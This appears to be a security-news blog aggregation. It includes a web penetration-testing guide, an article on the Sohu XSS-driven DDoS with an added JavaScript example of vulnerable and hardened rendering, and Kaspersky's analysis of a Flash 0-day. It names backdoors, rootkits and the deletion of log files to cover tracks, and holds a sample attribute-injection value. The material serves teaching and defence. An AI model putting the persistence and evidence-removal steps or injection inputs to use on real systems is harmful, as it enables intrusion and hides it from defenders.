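if __name__ == "__main__":
    for key, values in gather(ROBOTS_TXT, ERROR_PAGE_404).items():
        print(f"{key}: {values}")
```

<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
On the sample inputs the summary lists /admin/, /backup/ and /cgi-bin/ as paths the operator is hiding, the sitemap as a further inventory of URLs, and an exact Tomcat version from the stock 404 page. The banner step is the defensive side of fingerprinting: a version string on an error page is what lets a tester (or an attacker) look up known vulnerabilities for it, so the finding is usually "replace default error pages and strip version details".</div>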
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Real-world example:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Let us assume I am working on a penetration testing project. My boss came to me and handed me a piece of paper, saying: “I have spoken to the CIO of the client and we have to start the penetration testing for the company Nous Infosystems. The legal department will be sending you all the documents and confirmation of the authorization.” It’s a company you’ve never heard of before.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
What now?</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The information gathering starts from right here.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Threat Profiling</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
To ensure comprehensive testing, it is a very good idea to start with a threat profile. A threat is simply an attacker's goal against your target. A threat profile is a comprehensive list of the threats that are relevant to that application.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
These are expressed in terms of security threats.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
List out all the possible threats that may harm the web application according to the business logic of the application.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
A module-based threat profile should be created for the comprehensive penetration test.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
For example:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 41pt;">
<li>Threat profile for public module</li>
<li>Threat profile for login module</li>
<li>Threat profile for password change module</li>
<li>Threat profile for logout module</li>
<li>Threat profile for business rule escalation module</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Tests according to the threat profile</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
The threat profile is the key weapon of any attacker. Following the threat profile step by step can lead to the discovery of high and critical vulnerabilities.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Exploitation</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
Exploitation is the process of gaining control over a system.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
End Goal: administrative-level access to the target.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
During the penetration testing process, if a pen tester discovers a critical vulnerability that has a known exploit or that can be exploited with his own scripts/code, he can use the <strong>Metasploit Framework</strong> to exploit the target or to develop his own exploit.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Prerequisite:</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 72pt;">
<li>Scanning of the target.</li>
<li>Vulnerabilities found in the scanning phase.</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Steps involved:</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 72pt;">
<li>Check for the service/version running on the particular port.</li>
<li>Search the vulnerability in the service/version.</li>
<li>Exploit the target using tools like Metasploit.</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Covering tracks and maintaining access:</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
Once exploitation has succeeded, there are two ways to maintain access.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 72pt;">
<li>Using Backdoors</li>
<li>Using Rootkits</li>
<li>For Example: Netcat, NetBus</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Covering the Tracks</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Destroying the evidence of presence and activities.</li>
<li>Log files contain a record of every activity that has been performed on a computer, so it is very important to remove these log files. There are different ways to remove log files on Windows, Linux and Mac.</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Reporting</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
A penetration testing report should contain:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 43pt;">
<li>An executive summary.</li>
<li>Detailed description of the vulnerabilities.</li>
<li>Raw output.</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Below is the elaborated structure of a penetration testing report.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Executive Summary</li>
<li>Scope</li>
<li>Overall Assessment</li>
<li>Key Vulnerabilities Discovered</li>
<li>Graphical representation of OWASP Top 10</li>
<li>Key Findings and Action Items</li>
<li>Observations</li>
<li>Recommended Action Plan</li>
<li>Interpretation of Ratings</li>
<li>Threat Profile</li>
<li>Tools used (Optional)</li>
<li>Result of test cases</li>
<li>Guidelines for Developers</li>
</ul>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Conclusion</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
A successful web application penetration test can be executed by following OWASP and OSSTMM. Both are open-source security testing methodologies. By reading this article you should have a good idea of how a web application penetration test actually works. This article does not cover the entire WAPT process; rather, it can be used as a reference document. For the most common and top vulnerabilities, refer to:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 43pt;">
<li>OWASP TOP 10</li>
<li>SANS TOP 25</li>
<li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
</ul>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
References</h3>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li><a href="https://www.owasp.org/index.php/Main_Page" style="color: rgb(51, 51, 51) !important; text-decoration: none;">https://www.owasp.org/index.php/Main_Page</a></li>
<li><a href="http://www.isecom.org/research/osstmm.html" style="color: rgb(51, 51, 51) !important; text-decoration: none;">http://www.isecom.org/research/osstmm.html</a></li>
<li><a href="http://www.sans.org/" style="color: rgb(51, 51, 51) !important; text-decoration: none;">http://www.sans.org/</a></li>
</ul>
<span style="color: #747474; font-family: PT Sans, Arial, Helvetica, sans-serif; font-size: x-small;"><span style="line-height: 20px;"><a href="http://resources.infosecinstitute.com/step-step-guide-application-security-penetration-testing/" target="_blank">http://resources.infosecinstitute.com/step-step-guide-application-security-penetration-testing/</a></span></span>Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com1tag:blogger.com,1999:blog-4996980881256752769.post-68694677774393321032014-04-28T21:30:00.002-07:002014-04-28T21:30:30.491-07:00[infosecurity-magazine] China's Google Equivalent, Sohu, Used For Massive DDoS<h2 class="article-intro" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 1.3em; font-weight: 400; line-height: 1.4em; margin: 0px 0px 14px;">
Sohu.com, China’s eighth-largest website and currently the 27th most-visited website in the world, was the unwitting originator of a massive distributed denial-of-service (DDoS) attack earlier in the month, which was carried out using traffic hijacking techniques. In all, the application-layer attack consisted of more than 20 million GET requests originating from the browsers of 22,000+ internet users – all turned into unwilling accomplices by the offender.<a name='more'></a></h2>
<div class="article-content" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 12px;">
<div style="line-height: 1.4em; margin-bottom: 12px;">
Incapsula said that the Sohu.TV video streaming portion of the website was used to enable the DDoS attack. </div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The attack should serve as an object lesson to other tech giants. For instance, Google, with YouTube as its subsidiary, has an analogous business model. “While being relatively unfamiliar to Western audiences, Sohu (Chinese for ‘Search-fox’), is a local and global powerhouse,” wrote Incapsula security researchers Ofer Gayer and Ronen Atias, in a<a href="http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html" style="color: #e5141a; outline: none;" target="_blank"> blog</a>. “This rapidly growing $2.5 billion organization provides a variety of search and content solutions.”<br /><br />Incapsula uncovered the source of the browser-based DDoS attack and the replicated persistent cross-site scripting (XSS) vulnerability that allowed it to occur, and the Sohu team responded with a rapid patch that fixed the security hole, rendering this particular browser-based botnet completely useless.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Sohu, as a high-profile video content provider, allows its users to sign in with their own profiles. The DDoS attack was enabled by a persistent XSS vulnerability that allowed the offender to inject JavaScript code into the image tag associated with the profile image. As a result, every time the image was used on one of the site’s pages (e.g., in the comment section), the malicious code was also embedded inside, waiting to be executed by each future visitor to that page.<br /><br />As a result, each time a legitimate visitor landed on that page, his or her browser automatically executed the injected JavaScript, which in turn injected a hidden iframe tag with the address of the attacker's command-and-control domain. There, an Ajax-scripted DDoS tool hijacked the browser, forcing it to issue a DDoS request at a rate of one request per second.</div>
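The root cause described above is a stored profile-image value interpolated into an <code>img</code> tag without validation or escaping. The following is an added example, not Incapsula's or Sohu's code: a renderer with that defect beside a hardened one that allow-lists the URL, escapes the attribute, and a CSP that would also have blocked the injected iframe. Function names and the image host <code>img.example.invalid</code> are assumptions.

```javascript
// Added example (not code from the Sohu site or the Incapsula write-up).
// Names below (renderAvatarUnsafe, renderAvatarSafe, normalizeImageUrl,
// escapeAttr, contentSecurityPolicy) and the host img.example.invalid are
// hypothetical placeholders for this illustration.

// Vulnerable pattern: the stored profile-image value is concatenated straight
// into the src attribute. A value containing a double quote closes the
// attribute early and anything after it becomes a new attribute of the tag,
// which is exactly how script ends up inside an <img> element.
function renderAvatarUnsafe(profileImage) {
  return '<img class="avatar" src="' + profileImage + '">';
}

// Escape the characters that can terminate or alter an HTML attribute value.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Allow-list of hosts that may serve profile images (assumed placeholder).
const ALLOWED_IMAGE_HOSTS = new Set(["img.example.invalid"]);

// Validate a user-supplied image URL and return its normalized form, or null.
// The WHATWG URL parser percent-encodes quotes and spaces in the path, so a
// value that survives this check can no longer break out of the attribute.
function normalizeImageUrl(value) {
  let url;
  try {
    url = new URL(String(value));
  } catch (e) {
    return null; // relative, empty or malformed values are rejected outright
  }
  // Only http(s): this rules out javascript:, data: and other schemes.
  if (url.protocol !== "https:" && url.protocol !== "http:") return null;
  if (!ALLOWED_IMAGE_HOSTS.has(url.hostname)) return null;
  return url.href;
}

// Hardened pattern: validate first, fall back to a known-good default image,
// and escape the final value regardless of where it came from.
const DEFAULT_AVATAR = "/static/default-avatar.png"; // assumed placeholder

function renderAvatarSafe(profileImage) {
  const src = normalizeImageUrl(profileImage) || DEFAULT_AVATAR;
  return '<img class="avatar" src="' + escapeAttr(src) + '">';
}

// Defence in depth: a Content-Security-Policy header for the page. Without
// 'unsafe-inline' an injected inline handler does not run, frame-src 'none'
// stops the hidden iframe to a foreign command-and-control domain, and
// connect-src 'self' denies the Ajax flood a script would try to issue.
function contentSecurityPolicy() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "connect-src 'self'",
    "frame-src 'none'",
    "img-src 'self' https://img.example.invalid",
  ].join("; ");
}

// Constructed hostile value: a quote followed by a harmless marker attribute.
const HOSTILE_IMAGE_VALUE = 'https://img.example.invalid/cat.png" data-injected="1';

function demo() {
  return {
    unsafe: renderAvatarUnsafe(HOSTILE_IMAGE_VALUE), // marker becomes an attribute
    safe: renderAvatarSafe(HOSTILE_IMAGE_VALUE),     // quote is percent-encoded
    csp: contentSecurityPolicy(),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```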
<div style="line-height: 1.4em; margin-bottom: 12px;">
The video is the key to success for this attack.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
“Obviously one request per second is not a lot,” the researchers said. “However, when dealing with video content of 10, 20 and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively creating a self-sustaining botnet comprising 10s of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
By intercepting the malicious requests, Incapsula was able to track the source of the attack to Sohu by replacing the content of the target URL with a snippet of its own JavaScript.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
While this issue is patched, the attackers could be gearing up for a new, and perhaps bigger, offensive.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
“It should be noted that…the original DDoS tool on the attacker’s C&C domain was replaced with a much more robust version,” said Gayer and Atias. “This leads us to believe that what we saw yesterday was a sort of proof-of-concept test run. The current code is not only much more sophisticated, but it is also built for keeping track of the attack, for what seems like billing purposes. From the looks of it, someone is now using [this] to set up a chain of botnets for hire."</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
<a href="http://www.infosecurity-magazine.com/view/38137/chinas-google-equivalent-sohu-used-for-massive-ddos/" target="_blank">http://www.infosecurity-magazine.com/view/38137/chinas-google-equivalent-sohu-used-for-massive-ddos/</a></div>
</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-62125711520196446362014-04-28T21:29:00.001-07:002014-04-28T21:29:09.731-07:00[securelist] New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
In mid-April we detected two new SWF exploits. After some detailed analysis it was clear they didn't use any of the vulnerabilities that we already knew about. We sent the exploits off to Adobe and a few days later got confirmation that <a href="http://helpx.adobe.com/security/products/flash-player/apsb14-13.html" style="color: #3751ab; text-decoration: none;">they did indeed use a 0-day vulnerability that was later labeled as CVE-2014-0515</a>. The vulnerability is located in the Pixel Bender component, designed for video and image processing.</div>
<a name='more'></a><br />
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
We received a sample of the first exploit on April 14, while a sample of the second came on April 16. The first exploit was initially recorded by KSN on April 9, when it was detected by a generic heuristic signature. There were numerous subsequent detections on April 14 and 16. In other words, we succeeded in detecting a previously unknown threat using heuristics.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
According to KSN data, these exploits were stored as movie.swf and include.swf at an infected site. The only difference between the two pieces of malware is their shellcodes. It should be noted that the second exploit (include.swf) wasn't detected using the same heuristic signature as the first, because it contained a unique shellcode.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Each exploit comes as an unpacked flash video file. The Action Script code inside was neither obfuscated nor encrypted.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
As is usually the case with this kind of exploit, the first stage is a heap spray - preparing the dynamic memory for exploitation of the vulnerability. The exploits are also designed to check the OS version. If Windows 8 is detected, a slightly modified byte-code of the Pixel Bender component is used.</div>
<div class="c" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em; text-align: center;">
<img alt="" border="0" height="252" src="http://www.securelist.com/en/images/pictures/klblog/8213.png" style="border: 0px; margin: 0px;" width="316" /></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>A fragment of the vulnerable Pixel Bender code (the data in the red box is changed according to system version)</i></div>
<div class="c" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em; text-align: center;">
<img alt="" border="0" height="483" src="http://www.securelist.com/en/images/pictures/klblog/8214.png" style="border: 0px; margin: 0px;" width="311" /></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>Fragment of the decompiled exploit code</i></div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Next comes the actual exploitation of the vulnerability, namely modification of one of the indices in the table of methods/virtual functions.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Interestingly, both exploits have two shellcodes. The first is similar in both applications; it is quite short and prepares the memory for the successful functioning of the second shellcode.</div>
<div class="c" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em; text-align: center;">
<a href="http://www.securelist.com/en/images/pictures/klblog/8215.png" style="color: #3751ab; text-decoration: none;"><img alt="" border="0" height="495" src="http://www.securelist.com/en/images/pictures/klblog/8216.png" style="border: 0px; margin: 0px;" width="650" /></a></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>A fragment of the first shellcode debugged in WinDBG</i></div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Firstly, the current memory is marked as read, write and execute with the API function VirtualProtect, and then additional memory is allocated using VirtualAlloc. The second shellcode is copied to this memory and control is transferred to it. The initialization of API functions and transfer of the control to the second shellcode appear in red boxes in the screenshot above.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
The exploits' second shellcodes differ significantly.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
The exploit that we detected first has a standard shellcode (movie.swf). It performs a search of system libraries in the memory, and then downloads and runs the payload. Unfortunately, the link turned out to be inactive at the time of our research.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<img alt="" border="0" height="524" src="http://www.securelist.com/en/images/pictures/klblog/8217.png" style="border: 0px; margin: 0px;" width="639" /></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>Fragment of the movie.swf exploit's second shellcode responsible for the download and launch of the payload</i></div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
In the other exploit - include.swf - the second shellcode was unusual. It receives the base DLL address for flash10p.ocx, searches it for specific fragments and interacts with ciscompeaddin5x0 - Cisco MeetingPlace Express Add-In version 5x0. This add-in is used by web-conference participants to view documents and images from the presenter's screen. It should be noted that the exploit will not work if the required versions of Adobe Flash Player ActiveX and Cisco MPE are not present on the system.</div>
<div class="c" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em; text-align: center;">
<a href="http://www.securelist.com/en/images/pictures/klblog/8218.png" style="color: #3751ab; text-decoration: none;"><img alt="" border="0" height="483" src="http://www.securelist.com/en/images/pictures/klblog/8219.png" style="border: 0px; margin: 0px;" width="650" /></a></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>Fragment of the include.swf exploit's second shellcode</i></div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
It appears that part of the information for the exploit include.swf is passed on from outside. According to KSN data, the referer to include.swf points to another SWF file: stream.swf. At the same time, the referer of the first exploit - movie.swf - points to index.php located in the same folder as the exploit (see below). We couldn't establish the exact payload of the exploit include.swf due to a lack of data relayed from the landing page and/or other exploits.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
We are sure that all these tricks were used in order to carry out malicious activity against a very specific group of users without attracting the attention of security solutions. We believe that the Cisco add-in mentioned above may be used to download/implement the payload as well as to spy directly on the infected computer.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Both the exploits detected by us spread from a site located at <a href="http://jpic.gov.sy/" style="color: #3751ab; text-decoration: none;">http://jpic.gov.sy/</a>. The site was launched back in 2011 by the Syrian Ministry of Justice and was designed as an online forum for citizens to complain about law and order violations. We believe the attack was designed to target Syrian dissidents complaining about the government. The site <a href="http://ae.aliqtisadi.com/%D9%87%D8%A7%D9%83%D8%B1-%D9%8A%D8%AE%D8%AA%D8%B1%D9%82-%D9%85%D9%88%D8%A7%D9%82%D8%B9-%D8%AD%D9%83%D9%88%D9%85%D9%8A%D8%A9-%D8%B3%D9%88%D8%B1%D9%8A%D8%A9/" style="color: #3751ab; text-decoration: none;">was hacked</a> in September 2013, something the alleged hacker announced on his <a href="https://twitter.com/olivertuckedout" style="color: #3751ab; text-decoration: none;">twitter account</a>.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
The link to these exploits is as follows: http://jpic.gov.sy/css/images/_css/***********. When we entered the site, the installed malware payloads were already missing from the "_css" folder. We presume the criminals created a folder whose name doesn't look out of place on an administration resource, and where they loaded the exploits. The victims were probably redirected to the exploits using a frame or a script located at the site. To date, April 28, the number of detections by our products has exceeded 30. They were detected on the computers of seven unique users, all of them in Syria, which is not surprising considering the nature of the site. Interestingly, all the attacked users entered the website using various versions of Mozilla Firefox.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
It's likely that the attack was carefully planned and that professionals of a pretty high caliber were behind it. The use of professionally written 0-day exploits that were used to infect a single resource testifies to this.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Moreover, while the first exploit is pretty standard and can infect practically any unprotected computer, the second exploit (include.swf) only functions properly on computers where Adobe Flash Player 10 ActiveX and Cisco MeetingPlace Express Add-In are installed. The Flash Player Pixel Bender component, which <a href="http://www.adobe.com/devnet/pixelbender.html" style="color: #3751ab; text-decoration: none;">Adobe no longer supports</a>, was used as the attack vector. The authors were counting on the developers not finding a vulnerability in that component and that the exploit would remain active for longer. All this suggests that the attackers were not targeting users en masse.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<a href="http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks" target="_blank">http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-64031388156175867712014-04-28T21:27:00.001-07:002014-04-28T21:27:08.168-07:00[fireeye] The Road to Resilience: How Cybersecurity is Moving from the Back Office to the Boardroom<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
For too long, our industry has framed cybersecurity as a technical issue.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
We have measured success on the volume of malware we detect and block, not how we respond to the threats that matter. We have taken a one-size-fits-all approach to security incidents, regardless of who’s attacking, how they work, and what they’re after. We have rarely engaged other business units when responding to incidents — and when we do, we fixate on the technical details rather than weighing their business impact.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Yes, cybersecurity has a technical component. But more than anything, it is a business issue.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Fortunately, the old mindset is changing. Under the banner of “cyber resilience,” security leaders are beginning to acknowledge that cybersecurity must evolve. Striving to ward off attacks is no longer enough — organizations must also respond to incidents with a focus on managing their business impact.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
To gauge how far along organizations in Europe, the Middle East, and Africa (EMEA) are in this evolution, FireEye recently asked 25 security leaders across the region about their experience and perceptions. Their answers reveal a sizable divide in both awareness and maturity when it comes to cyber resilience.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Breaches Increasingly Routine</strong><br />Not surprisingly, EMEA security leaders say that cyber breaches are increasingly routine. In our survey, 44 percent of organizations said they had been breached at least once per year. And that total probably understates the problem — a full 28 percent were not sure whether they had been breached.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img1.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="img1" class="aligncenter wp-image-5361" height="203" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img1.png" style="border: 0px; max-width: 98%;" width="587" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>All threats viewed equally — regardless of risk or impact</strong><br />A solid majority of respondents (68 percent) said they “always” care about breaches. Only 16 percent said their level of concern depends on the severity of the incident. This lopsided statistic suggests that IT professionals are not yet looking at breaches from the perspective of risk or impact.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
